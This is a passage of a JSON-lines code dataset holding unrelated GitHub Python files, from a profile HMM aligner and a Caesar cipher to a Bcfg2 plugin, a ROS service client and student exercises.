Brands=Brands_instance[0],\n Categories=Categories_instance[0],\n CodesProductsOff=CodesProductsOff_instance[0],\n NutriscoreGrades=NutriscoreGrades_instance[0],\n )\n product_count += 1\n except IntegrityError as exception:\n count += 1\n print(\"IntegrityError count :\", count, exception.args[0])\n pass\n\n","repo_name":"acandido-tech/Projet11-ROL-1","sub_path":"product/offapi/insertdb.py","file_name":"insertdb.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10927146121","text":"import numpy\nimport time\nimport sys\nimport gc\nfrom ecell4 import *\n\ndef run_single(T, V, N, R, D):\n L = numpy.power(V, 1.0/3.0) # cuboid side length\n with species_attributes():\n A | {'D': D, 'radius': R}\n m = get_model() \n M = max(int(min(cbrt(N + N), L / (2*R))), 3)\n w = egfrd.EGFRDWorld(Real3(L, L, L), Integer3(M, M, M))\n w.bind_to(m)\n w.add_molecules(Species('A'), N)\n sim = egfrd.EGFRDSimulator(w)\n stirTime = T*0.00001\n t = 0.0\n gc.disable\n sim.run(stirTime)\n print(\"Now running\",int(N),\"molecules for\",T,\"s\")\n endTime = stirTime+T\n start = time.time()\n sim.run(T)\n end = time.time()\n gc.collect()\n gc.enable()\n duration = end-start\n print(\"time taken:\",duration,\"s\")\n return duration\n\nif __name__ == '__main__':\n T = 1e-2\n V = 3e-15\n N = 1e+4\n R = 2.5e-9\n D = 1e-12\n #python run_single.py 1e-5 1e-15 1e+3 2.5e-9 1e-12\n if(len(sys.argv) == 6):\n T = float(sys.argv[1])\n V = float(sys.argv[2])\n N = float(sys.argv[3])\n R = float(sys.argv[4])\n D = float(sys.argv[5])\n run_single(T, V, N, R, D)\n\n","repo_name":"ecell/spatiocyte","sub_path":"examples/benchmark/egfrd/run_single.py","file_name":"run_single.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"72190969962","text":"n, m = map(int, input().split(' '))\n\nmapp = []\nfor i in range(n):\n mapp.append(list(map(int, input().split(' '))))\n\nhouse_list = []\nchicken_house_list = []\n\nfor i in range(n):\n for j in range(n):\n if mapp[i][j] == 1:\n house_list.append((i,j))\n elif mapp[i][j] == 2:\n chicken_house_list.append((i, j))\n mapp[i][j] = 0\n\nanswer = 99999\ncheck = [0 for _ in range(len(chicken_house_list))]\ntemp = []\nmin_dist = 99999\n\ndef dfs(idx, cnt):\n global min_dist\n if cnt == m:\n total_dist = 0\n for x, y in house_list:\n chick_dist = 9999\n for a, b in temp:\n chick_dist = min(chick_dist, abs(a-x) + abs(b-y))\n total_dist += chick_dist\n min_dist = min(total_dist, min_dist)\n return\n\n for i in range(idx, len(chicken_house_list)):\n if check[i] == 1:\n continue\n check[i] = 1\n temp.append(chicken_house_list[i])\n dfs(i, cnt+1)\n temp.pop()\n check[i]=0\n\ndfs(0, 0)\nprint(min_dist)\n","repo_name":"haeyong27/acmicpc","sub_path":"chicken.py","file_name":"chicken.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31598628661","text":"import numpy as np \nfrom copy import copy \n\"\"\"\nSequence Alignment with Profile HMM Problem: Align a new sequence to a family of sequences using a profile HMM.\n\nInput: A multiple alignment Alignment, a threshold θ, a pseudocount value σ, and a string Text.\nOutput: An optimal hidden path emitting Text in HMM(Alignment, θ, σ).\n\nCode Challenge: Solve the Sequence Alignment with Profile HMM Problem.\n\nInput: A string x followed by a threshold θ and a pseudocount σ, followed by an alphabet Σ, followed by a multiple alignment Alignment whose strings are formed from Σ.\nOutput: An optimal hidden path emitting x in HMM(Alignment, θ, σ).\n\nSample Input:\n\nAEFDFDC\n--------\n0.4 0.01\n--------\nA B C D E F\n--------\nACDEFACADF\nAFDA---CCF\nA--EFD-FDC\nACAEF--A-C\nADDEFAAADF\n\nSample Output:\n\nM1 D2 D3 M4 M5 I5 M6 M7 M8\n\"\"\"\n\n\nfile = open(\"SeqAlignProfileHMM_sample.txt\", \"r\")\nfile = open(\"SeqAlignProfileHMM_test.txt\", \"r\")\nfile = open(\"dataset_397441_14.txt\", \"r\")\ndata = file.readlines()\nstring = data[0].strip('\\n')\nthreshold = float(data[2].strip('\\n').split(' ')[0]) \npseudocount = float(data[2].strip('\\n').split(' ')[1]) \n\nalphabet = data[4].strip('\\n').split(' ')\n\nAlignment = []\nfor d in data[6:]: \n\tAlignment.append(d.strip('\\n'))\n# print(Alignment)\n\ndef identify_removed_columns(threshold, Alignment): \n\t\n\tremoved_columns = []\n\tfor column in range(len(Alignment[0])): \n\t\tcount = 0 \n\t\tfor sequence in Alignment: \n\t\t\tif sequence[column] == '-': \n\t\t\t\tcount += 1 \n\t\tif count / len(Alignment) >= threshold: \n\t\t\tremoved_columns.append(column)\n\n\treturn removed_columns\n\ndef construct_transition_matrix_with_pseudocounts(States, Alignment, removed_columns, pseudocount): \n\n\ttotal_count = np.zeros((len(States), len(States)))\n\ttransition = copy(total_count)\n\tPaths = []\n\tfor sequence in Alignment: \n\n\t\tcount = np.zeros((len(States), len(States)))\n\t\tpath = []; State_idx = 0 \n\t\tfor idx, letter in enumerate(sequence): \n\t\t\tif idx == 0: \n\t\t\t\tpath.append(States[State_idx])\n\t\t\tif idx in removed_columns: \n\t\t\t\tif letter in alphabet: \n\t\t\t\t\tif State_idx == 0: \n\t\t\t\t\t\tpath.append(States[State_idx+1])\n\t\t\t\t\telse: \n\t\t\t\t\t\tif States[State_idx][0] == \"M\": \n\t\t\t\t\t\t\tpath.append(States[State_idx+2])\n\t\t\t\t\t\telif States[State_idx][0] == \"D\": \n\t\t\t\t\t\t\tpath.append(States[State_idx+1])\t\t\t\t\t\t\t\n\t\t\t\t\t\telse: \n\t\t\t\t\t\t\tpath.append(States[State_idx])\n\n\t\t\telse: \n\t\t\t\tif State_idx == 0: \n\t\t\t\t\tState_idx += 2\n\t\t\t\telse:\n\t\t\t\t\tif States[State_idx][0] == \"I\": \n\t\t\t\t\t\tState_idx += 1 \n\t\t\t\t\telif States[State_idx][0] == \"D\": \n\t\t\t\t\t\tState_idx += 2\n\t\t\t\t\telse: #States[State_idx][0] == \"M\": \n\t\t\t\t\t\tState_idx += 3 \n\t\t\t\tif letter == \"-\": \n\t\t\t\t\tpath.append(States[State_idx+1])\n\t\t\t\telse: \n\t\t\t\t\tpath.append(States[State_idx])\n\n\t\tpath.append(States[-1])\n\t\tPaths.append(path)\n\t\tfor i in range(len(path)-1): \n\t\t\tcount[States.index(path[i])][States.index(path[i+1])] += 1 \n\t\t# print(count)\n\t\ttotal_count += count \n\t\t# print(path)\n\t# print(total_count)\n\tfor idx, state_trans_counts in enumerate(total_count):\n\t\tif np.sum(state_trans_counts) != 0: \n\t\t\ttransition[idx] = np.round(state_trans_counts / np.sum(state_trans_counts),3) \n\t# print(transition)\n\n\t# Add pseudocounts\n\trow_start_idx = [0, 2]\n\twhile row_start_idx[-1] + 3 != len(States)-1: \n\t\trow_start_idx.append(row_start_idx[-1]+3)\n\tcol_start_idx = [1]\n\twhile col_start_idx[-1] + 3 != len(States)+1: \n\t\tcol_start_idx.append(col_start_idx[-1]+3)\n\t# print(row_start_idx, col_start_idx)\n\tfor rowidxs, colidxs in zip(row_start_idx, col_start_idx): \n\t\tif rowidxs == 0: \n\t\t\tnumrows = 2\n\t\telse: \n\t\t\tnumrows = 3\n\t\tif colidxs == len(States) - 2: \n\t\t\tnumcols = 2 \n\t\telse: \n\t\t\tnumcols = 3 \n\t\tfor i in range(rowidxs, rowidxs + numrows): \n\t\t\tfor j in range(colidxs, colidxs + numcols): \n\t\t\t\ttransition[i][j] += pseudocount\n\n\t#normalize transition matrix \n\tfor idx, trans in enumerate(copy(transition)):\n\t\tif np.sum(trans) != 0: \n\t\t\ttransition[idx] = np.round(trans / np.sum(trans),3)\n \n\n\n\treturn \ttransition, Paths\n\ndef construct_emission_matrix_with_pseudocounts(States, alphabet, Alignment, Paths, removed_columns, pseudocount): \n\n\temission = np.zeros((len(States), len(alphabet)))\n\tcount = copy(emission)\n\tfor idx1, sequence in enumerate(Alignment): \n\t\tidx_str = 0 \n\t\tfor idx2, letter in enumerate(sequence): \n\t\t\tif letter in alphabet: \n\t\t\t\tcount[States.index(Paths[idx1][1:-1][idx2-idx_str])][alphabet.index(letter)] \\\n\t\t\t\t+= 1 \n\t\t\telif letter == '-' and idx2 in removed_columns: \n\t\t\t\tidx_str += 1 \n\t\t\telse: \n\t\t\t\tpass\n\tfor idx, state_emiss_counts in enumerate(count):\n\t\tif np.sum(state_emiss_counts) != 0: \n\t\t\temission[idx] = np.round(state_emiss_counts / np.sum(state_emiss_counts), 3)\n\n\n\tfor i in range(len(States)): \n\t\tfor j in range(len(alphabet)): \n\t\t\tif States[i][0] in [\"I\", \"M\"]: \n\t\t\t\temission[i][j] += pseudocount\n\n\t#normalize emission matrix \n\tfor idx, emiss in enumerate(copy(emission)):\n\t\tif np.sum(emiss) != 0: \n\t\t\temission[idx] = np.round(emiss / np.sum(emiss),3)\n\n\treturn emission\n\ndef score_ProfileHMM_ViterbiGraph(States, transition, emission, string, alphabet): \n\n\ts = np.zeros((len(States), len(string) + 1 + 1))\n\tbacktrack = np.zeros((len(States), len(string) + 1 + 1, 2)) #holds indicies of node to backtrack to \n\ts[0,0] = 1 \n\tfor j in range(s.shape[1]): #emissions \n\t\tif j > 0 and j < len(string) + 1: \n\t\t\tletter_idx = alphabet.index(string[j-1])\n\t\tfor i in range(s.shape[0]): #states \n\t\t\tstate = States[i]\n\t\t\tif state == 'S': \n\t\t\t\tcontinue\n\t\t\tif j == 0 and state[0] != 'D': \n\t\t\t\tcontinue \n\t\t\tif j == s.shape[1] - 1 and state != \"E\":\n\t\t\t\tcontinue \n\t\t\tif j != s.shape[1] - 1 and state == \"E\":\n\t\t\t\tcontinue\n\n\t\t\tif j == 0: # First column of D's \n\t\t\t\ts[i][j] = s[i-3][j]*transition[i-3][i]\n\t\t\t\tbacktrack[i][j] = [i-3, j]\n\t\t\t\tcontinue \n\n\t\t\tif j == 1: \n\t\t\t\tif state[0] == \"I\": \n\t\t\t\t\ts[i][j] = s[i-1][j-1] * transition[i-1][i]*emission[i][letter_idx]\n\t\t\t\t\tbacktrack[i][j] = [i-1, j-1]\n\t\t\t\telif state[0] == \"M\": \n\t\t\t\t\ts[i][j] = s[i-2][j-1] * transition[i-2][i]*emission[i][letter_idx]\n\t\t\t\t\tbacktrack[i][j] = [i-2, j-1]\n\t\t\t\telse: # Deletion States \n\t\t\t\t\tif state == \"D1\": \n\t\t\t\t\t\ts[i][j] = s[i-2][j]*transition[i-2][i]\n\t\t\t\t\t\tbacktrack[i][j] = [i-2, j]\n\t\t\t\t\telse:\n\t\t\t\t\t\tscores = [s[i-4][j]*transition[i-4][i], s[i-3][j]*transition[i-3][i], \\\n\t\t\t\t\t\ts[i-2][j]*transition[i-2][i]]\n\t\t\t\t\t\ts[i][j] = max(scores)\n\t\t\t\t\t\tbacktrack[i][j] = [i-(4 - scores.index(max(scores))), j] \n\t\t\telse: \n\t\t\t\tif state[0] == \"I\": \n\t\t\t\t\tif state == \"I0\": \n\t\t\t\t\t\ts[i][j] = s[i][j-1] * transition[i][i]*emission[i][letter_idx]\n\t\t\t\t\t\tbacktrack[i][j] = [i, j-1]\n\t\t\t\t\telse: \n\t\t\t\t\t\tscores = [s[i-2][j-1] * transition[i-2][i]*emission[i][letter_idx], s[i-1][j-1] * transition[i-1][i]*emission[i][letter_idx], \\\n\t\t\t\t\t\ts[i][j-1] * transition[i][i]*emission[i][letter_idx]]\n\t\t\t\t\t\ts[i][j] = max(scores)\n\t\t\t\t\t\tbacktrack[i][j] = [i-(2 - scores.index(max(scores))), j-1]\n\t\t\t\telif state[0] == \"M\": \n\t\t\t\t\tif state == \"M1\": \n\t\t\t\t\t\ts[i][j] = s[i-1][j-1] * transition[i-1][i]*emission[i][letter_idx]\n\t\t\t\t\t\tbacktrack[i][j] = [i-1, j-1]\n\t\t\t\t\telse: \n\t\t\t\t\t\tscores = [s[i-3][j-1] * transition[i-3][i]*emission[i][letter_idx], s[i-2][j-1] * transition[i-2][i]*emission[i][letter_idx], \\\n\t\t\t\t\t\ts[i-1][j-1] * transition[i-1][i]*emission[i][letter_idx]]\n\t\t\t\t\t\ts[i][j] = max(scores)\n\t\t\t\t\t\tbacktrack[i][j] = [i-(3 - scores.index(max(scores))), j-1]\n\t\t\t\telif state == \"E\": \n\t\t\t\t\t\tscores = [s[i-3][j-1], s[i-2][j-1], \\\n\t\t\t\t\t\ts[i-1][j-1]]\n\t\t\t\t\t\ts[i][j] = max(scores)\n\t\t\t\t\t\tbacktrack[i][j] = [i-(3 - scores.index(max(scores))), j-1]\n\t\t\t\telse: # Deletion States \n\t\t\t\t\tif state == \"D1\": \n\t\t\t\t\t\ts[i][j] = s[i-2][j]*transition[i-2][i]\n\t\t\t\t\t\tbacktrack[i][j] = [i-2, j]\n\t\t\t\t\telse:\n\t\t\t\t\t\tscores = [s[i-4][j]*transition[i-4][i], s[i-3][j]*transition[i-3][i], \\\n\t\t\t\t\t\ts[i-2][j] * transition[i-2][i]]\n\t\t\t\t\t\ts[i][j] = max(scores)\n\t\t\t\t\t\tbacktrack[i][j] = [i-(4 - scores.index(max(scores))), j]\t\t\t\t\n\treturn s, backtrack\n\ndef backtrack_profileHMM_Viterbi(backtrack, States, state, column): \n\t# print(state, column, States[state])\n\tif States[state] != \"S\": \n\t\tbacktrack_profileHMM_Viterbi(backtrack, States, int(backtrack[state][column][0]), int(backtrack[state][column][1]))\n\t\tif States[state] != \"E\": \n\t\t\tprint(States[state], end=' ')\n\telse: \n\t\treturn \n\n\nremoved_columns = identify_removed_columns(threshold, Alignment)\n# print(removed_columns)\n# Create states list \nStates = ['S', 'I0']\nfor num in range(1, len(Alignment[0]) - len(removed_columns) + 1): \n\tStates.append('M' + str(num))\n\tStates.append('D' + str(num))\n\tStates.append('I' + str(num))\nStates.append('E')\n# print(States)\ntransition, Paths = construct_transition_matrix_with_pseudocounts(States, Alignment, removed_columns, pseudocount)\n# print(transition)\n# print(Paths)\n# print(States, alphabet)\nemission = construct_emission_matrix_with_pseudocounts(States, alphabet, Alignment, Paths, removed_columns, pseudocount)\n# print(emission)\n# Output results \ns, backtrack = score_ProfileHMM_ViterbiGraph(States, transition, emission, string, alphabet)\n# print(string)\nbacktrack_profileHMM_Viterbi(backtrack, States, len(States)-1, s.shape[1]-1)\n# print(s[-1][-1])\n# print(States)\n# print(np.round(s.T, 3))\n# Path = [\"S\", \"M1\", \"D2\", \"D3\", \"M4\", \"M5\", \"I5\", \"M6\", \"M7\", \"M8\", \"E\"]\n\n# score = 0\n# old_state = \"S\"\n# j = -1\n# for state in Path[1:-1]: \n# \tif state[0] != \"D\": \n# \t\tj += 1\n# \tstate_idx = Path.index(state)\n# \tprev_state_idx = Path.index(old_state)\n# \tscore += transition[prev_state_idx][state_idx] * emission[state_idx][alphabet.index(string[j])]\n# \told_state = copy(state)\n\t \n# print(score)","repo_name":"osarwar/BioinformaticsAlgorithms","sub_path":"5 - HMMs for Alignment & Protein Classification/SeqAlignProfileHMM.py","file_name":"SeqAlignProfileHMM.py","file_ext":"py","file_size_in_byte":9393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"4955058295","text":"#!/usr/bin/env python3\n# รัฏชพล ปุกคำ\n# 620510660\n# Lab 06\n# Problem 1\n# 204113 Sec 002\nimport time\nimport datetime\nfrom pylab import *\ndef main():\n n = int(input())\n rand_float(n)\ndef rand_float(n):\n x = (int)(time.time()) \n l = []\n for i in range(n):\n y = datetime.datetime.now()\n a = (int)(y.microsecond) \n m = (int)(y.minute*y.second)\n c = (int)(y.minute*y.second)\n xn = (a*x+c) % m\n xn = xn/m\n l.append(xn) \n x = xn #เปลี่ยนseedไปเรื่อยๆ\n plot(l,'ro')\n show()\n print(\"สวัสดีตอนง่วง\")\n \nif __name__ == '__main__' :\n main()\n \n","repo_name":"kenmono/hello_world_01","sub_path":"Lab05_1_620510660.py","file_name":"Lab05_1_620510660.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19095815487","text":"import textwrap\n\nimport praw\nimport sys\n\nfrom Api import ConkyWriter\nfrom random import choice\nimport argparse\n\n# choose subreddit\nparser = argparse.ArgumentParser()\nparser.add_argument(\"subreddit\")\nsub = parser.parse_args().subreddit\nreddit = praw.Reddit(\"Dimdalf reddit\")\nsubmissions = list(reddit.get_subreddit(sub).get_hot())\n\n# choose a color\nmy_little_colors = ['aquamarine', 'chartreuse', 'chocolate', 'deepskyblue', 'firebrick', 'darkorange']\ncolor = choice(my_little_colors)\nmy_little_colors = my_little_colors.remove(color)\n\n# setup writter\nWriter = ConkyWriter()\n\n# constants\nBREAK_LENGTH = 40\n\nsubmission = \"\"\nfor submission in submissions:\n if not submission.stickied:\n break\n\n\nquote = submission.title\n\nquotes = textwrap.wrap(quote, BREAK_LENGTH)\n\nquotes.insert(0, sub.capitalize()+\":\")\nfor color_index, line in enumerate(quotes):\n Writer.voffset(8).offset(16).color(color+str(color_index+1)).write(line).newline()\n","repo_name":"alskgj/conky_stuff","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"45178445446","text":"#name error -> sintaxe\n#value error -> erro de valor int() -> str()\n#zero division error -> divisão por 0 =!\n#type error -> str -> int\n#index error -> lst fora de range\n#moduleNotfound -> modulo nao encontrado\n#key error -> erro de chave\n#keyboardInterrupt -> usuario para o programa\n#memoryError -> erro de variavel\n#connection error -> \n#runtime error -> erro de run\n\ntry:\n a = int(input('Digite o valor: '))\n b = int(input('Digite um valor: '))\n c = a/b\nexcept (ValueError, TypeError):\n print('Tivemos um problema com os tipos de dados que voce digitou.')\nexcept ZeroDivisionError:\n print('nao é possivel dividir um numero zero!')\nexcept KeyboardInterrupt:\n print('O usuario preferiu nao informar os dados. ')\nexcept Exception as erro:\n print(f'O erro encontrado foi {erro.__cause__}, {erro}')\n# except Exception as erro:\n# print(f'Problema encontrado foi {erro},{erro.__class__} :')# Para mostrar aonde esta o erro, apenas coloque a variavel 'Erro'\n \nelse:\n print(c)\nfinally:\n print('Volte sempre')","repo_name":"Vinicius-Nunez/Aprendendo-Python","sub_path":"Aulas/aula23-tratamento-de-Erro.py","file_name":"aula23-tratamento-de-Erro.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70622371245","text":"\"\"\" GroupLogic is a connector plugin that lets you use an XML Genshi\ntemplate to dynamically set additional groups for clients. \"\"\"\n\nimport os\nimport lxml.etree\nfrom threading import local\nimport Bcfg2.Server.Plugin\nfrom Bcfg2.Server.Plugins.Metadata import MetadataGroup\n\n\nclass GroupLogicConfig(Bcfg2.Server.Plugin.StructFile):\n \"\"\" Representation of the GroupLogic groups.xml file \"\"\"\n create = lxml.etree.Element(\"GroupLogic\",\n nsmap=dict(py=\"http://genshi.edgewall.org/\"))\n\n def __init__(self, filename, core):\n Bcfg2.Server.Plugin.StructFile.__init__(self, filename,\n should_monitor=True)\n self.core = core\n\n def Index(self):\n Bcfg2.Server.Plugin.StructFile.Index(self)\n\n if self.core.metadata_cache_mode in ['cautious', 'aggressive']:\n self.core.metadata_cache.expire()\n\n def _match(self, item, metadata, *args):\n if item.tag == 'Group' and not len(item.getchildren()):\n return [item]\n return Bcfg2.Server.Plugin.StructFile._match(self, item, metadata,\n *args)\n\n def _xml_match(self, item, metadata, *args):\n if item.tag == 'Group' and not len(item.getchildren()):\n return [item]\n return Bcfg2.Server.Plugin.StructFile._xml_match(self, item, metadata,\n *args)\n\n\nclass GroupLogic(Bcfg2.Server.Plugin.Plugin,\n Bcfg2.Server.Plugin.Connector):\n \"\"\" GroupLogic is a connector plugin that lets you use an XML\n Genshi template to dynamically set additional groups for\n clients. \"\"\"\n # perform grouplogic later than other Connector plugins, so it can\n # use groups set by them\n sort_order = 1000\n\n def __init__(self, core):\n Bcfg2.Server.Plugin.Plugin.__init__(self, core)\n Bcfg2.Server.Plugin.Connector.__init__(self)\n self.config = GroupLogicConfig(os.path.join(self.data, \"groups.xml\"),\n core=core)\n self._local = local()\n\n def get_additional_groups(self, metadata):\n if not hasattr(self._local, \"building\"):\n # building is a thread-local set that tracks which\n # machines GroupLogic is getting additional groups for.\n # If a get_additional_groups() is called twice for a\n # machine before the first call has completed, the second\n # call returns an empty list. This is for infinite\n # recursion protection; without this check, it'd be\n # impossible to use things like metadata.query.in_group()\n # in GroupLogic, since that requires building all\n # metadata, which requires running\n # GroupLogic.get_additional_groups() for all hosts, which\n # requires building all metadata...\n self._local.building = set()\n if metadata.hostname in self._local.building:\n return []\n self._local.building.add(metadata.hostname)\n rv = []\n for el in self.config.XMLMatch(metadata).findall(\"Group\"):\n if el.get(\"category\"):\n rv.append(MetadataGroup(el.get(\"name\"),\n category=el.get(\"category\")))\n else:\n rv.append(el.get(\"name\"))\n self._local.building.discard(metadata.hostname)\n return rv\n","repo_name":"Bcfg2/bcfg2","sub_path":"src/lib/Bcfg2/Server/Plugins/GroupLogic.py","file_name":"GroupLogic.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"19"} +{"seq_id":"35555212472","text":"alphabets = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\n#direction = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\")\n# text = input(\"Type your message:\\n\").lower()\n# shift = int(input(\"Type the shift number:\\n\"))\n\n# Don't change the code above\n#########################################################\n# function to encrypt text\n#def encrypt(plain_text, shift_number):\n# shift_index = []\n# encrypted_word = \"\"\n# for letter in text:\n# letter_index = alphabets.index(letter)\n# letter_index += shift\n# letter_index %= 26\n# encrypted_word += alphabets[letter_index]\n \n# print(f\"The encoded text is {encrypted_word}\")\n\n# function to decrypt text\n#def decrypt(cipher_text, shift_number):\n# decrypted_word = \"\"\n# for letter in cipher_text:\n# letter_index = alphabets.index(letter)\n# letter_index = abs(letter_index - shift)\n# letter_index %= 26\n# decrypted_word += alphabets[letter_index]\n# print(f\"Your decoded text is {decrypted_word}\")\n#######################################################3\n\ndef caesar(text, shift, direction):\n # to hold the final result\n result = \"\"\n # to hold index of letter in alphabet list\n alpha_position = 0\n # to hold letter position after operation performed\n new_position = 0\n for letter in text:\n # for whitespaces\n if letter not in alphabets:\n result += letter\n continue\n # get hold of index of letter in alphabets list\n alpha_position = alphabets.index(letter)\n if direction == \"encode\":\n # for encoding, shift letter position to the right\n new_position = alpha_position + shift\n new_position %= 26\n elif direction == \"decode\":\n # for decoding, shift letter position to the left\n new_position = alpha_position - shift\n new_position %= 26\n result += alphabets[new_position]\n print(f\"The final output is:\\n{result}\")\n \n# to check if user wants to quit\nis_end = False\n\nwhile is_end == False:\n direction = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\")\n text = input(\"Type your message:\\n\").lower()\n shift = int(input(\"Type the shift number:\\n\"))\n\n caesar(text, shift, direction)\n\n response = input(\"Would like to go again? (yes/no)\\n\")\n if response == \"no\":\n print(\"Goodbye!\")\n is_end = True\n elif response != \"yes\":\n print(\"Enter the right thing for once in your miserable life!\")\n is_end = True\n","repo_name":"dojjo-corp/100-days-of-code-python","sub_path":"beginners/day_8/encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"36521535866","text":"import pandas as pd\nimport numpy as np\n\n\ndef prep_df(DF, feature_list, index=True):\n \"\"\"\n Returns a numpy of shape (ex, features) from a pandas dataframe\n \"\"\"\n\n # Select features we're interested in.\n sel_DF = DF[feature_list].dropna()\n\n if index:\n return sel_DF.to_numpy(), sel_DF.index\n else:\n return sel_DF.to_numpy()\n\n\ndef prep_df_lags(DF, feature_list, lags, index=True):\n \"\"\"\n Returns a numpy of shape (ex, lags, features) from a pandas dataframe\n \"\"\"\n\n # Build lag list if lags were specified as an integer\n if type(lags) is int:\n lags = list(range(lags+1))[1:]\n\n # Stack lagged slices\n res_npy = []\n for feature in feature_list:\n lagged_features = []\n for lag in lags:\n lagged_features.append(DF[feature].shift(lag))\n lag_features = pd.concat(lagged_features, axis=1).dropna()\n res_npy.append(lag_features)\n\n # Build a common index\n common_idx = res_npy[0].index\n for feat in res_npy:\n common_idx = common_idx.intersection(feat.index)\n\n # Normalize the index\n for i in range(len(res_npy)):\n res_npy[i] = res_npy[i].loc[common_idx].to_numpy()\n\n # Build result array\n res_npy = np.stack(res_npy, axis=1)\n\n # Return dataset and possibly index\n if index:\n return res_npy, common_idx\n else:\n return res_npy\n","repo_name":"ncsa/DRYML","sub_path":"src/dryml/data/pandas/prep_funcs.py","file_name":"prep_funcs.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"34223866990","text":"def parse_command(text: str, entities : list[str]) -> (str, str, bool):\n entity = \"\"\n state = \"\"\n states = [\"an\", \"aus\", \"on\", \"off\"]\n for s in states:\n if s in text:\n state = s\n break\n for e in entities:\n if e in text:\n entity = e\n break\n\n found = (entity != \"\" and state != \"\")\n return entity, state, found\n\n\nif __name__ == '__main__':\n entities = [\"nachtlicht\", \"stern\"]\n assert parse_command(\"mach das nachtlicht an\", entities) == (\"nachtlicht\", \"an\", True)\n assert parse_command(\"stern aus\", entities) == (\"stern\", \"aus\", True)\n assert parse_command(\"stern\", entities) == (\"stern\", \"\", False)","repo_name":"CHC0815/assistant","sub_path":"src/cmd_parser.py","file_name":"cmd_parser.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"18303220347","text":"# Write your solution here\r\nmy_list = []\r\ni = 1\r\nwhile True:\r\n task = int(input(\"New item:\"))\r\n if task == 0:\r\n print(\"Bye!\")\r\n break\r\n else:\r\n my_list.append(task)\r\n print(\"The list now:\",my_list)\r\n print(\"The list in order:\",sorted(my_list))\r\n","repo_name":"Aten31/Mooc-Python-Learning","sub_path":"list_twice.py","file_name":"list_twice.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19826540540","text":"import html\nimport requests\nimport pprint\nimport os\n\nurl = 'http://10.11.203.199:2224/' \n\ndef main():\n os.system('clear')\n print(\"Welcome to the yugioh serach API\")\n choice = input('What would you like to search? [search,imgSearch,typeSearch,priceSearch]')\n if choice == 'search':\n name = input(\"Please input the name of the card you want to search: \")\n query = 'search?name='\n name = html.escape(name)\n pprint.pprint(requests.get(url+query+name).json())\n elif choice == 'imgSearch':\n name = input(\"Please input the name of the card you want to serach: \")\n query = 'imgSearch?name='\n name = html.escape(name)\n pprint.pprint(requests.get(url+query+name).json())\n elif choice == 'typeSearch':\n name = input(\"Please enter the type of cards you want to see: [trap card, spell card, normal monster, effect monster, ritual monster, synchro monster, xyz monster, pendulum monster, link monster, fusion monster]: \")\n query = 'typeSearch?type='\n name = html.escape(name)\n pprint.pprint(requests.get(url+query+name).json())\n elif choice == 'priceSearch':\n name = input(\"Please enter a price and the amazon price that matches or is less than the entered price in order of descending price list and the name of the card will display: \")\n query = 'priceSearch?price='\n pprint.pprint(requests.get(url+query+name).json())\n else:\n print(\"That is not a valid input\")\n\nif __name__=='__main__':\n main()\n","repo_name":"jshigetomi/mycode","sub_path":"Mini_Project_3/altaresearch-requests02.py","file_name":"altaresearch-requests02.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30875010761","text":"#!/usr/bin/env python\n\nimport rospy\nfrom std_msgs.msg import String\nfrom morai_msgs.msg import ScenarioLoad\nfrom morai_msgs.srv import MoraiScenarioLoadSrv\n\ndef srv_client():\n rospy.init_node('ros_client', anonymous=True)\n rospy.wait_for_service('/Service_MoraiSL')\n\n scenario_setting = ScenarioLoad()\n scenario_setting.file_name = \"ssafy_scenario\"\n scenario_setting.load_network_connection_data = False\n scenario_setting.delete_all = False\n scenario_setting.load_ego_vehicle_data = False\n scenario_setting.load_surrounding_vehicle_data = True\n scenario_setting.load_pedestrian_data = True\n scenario_setting.load_obstacle_data = True\n scenario_setting.set_pause = False\n\n rate = rospy.Rate(1) # 1 hz\n while not rospy.is_shutdown():\n try:\n ros_srv = rospy.ServiceProxy('/Service_MoraiSL', MoraiScenarioLoadSrv)\n result = ros_srv(scenario_setting)\n rospy.loginfo(result)\n except rospy.ServiceException as e:\n rospy.logwarn('no respone')\n\n rate.sleep()\n\nif __name__ == '__main__':\n try:\n srv_client()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"JYH00N/ssafy_ad","sub_path":"ssafy_1/scripts/1_3_srv_scenario_load.py","file_name":"1_3_srv_scenario_load.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3403261928","text":"import tkinter as tk\nimport pathlib\nfrom config import MESSAGE_DIR, HOST\nfrom 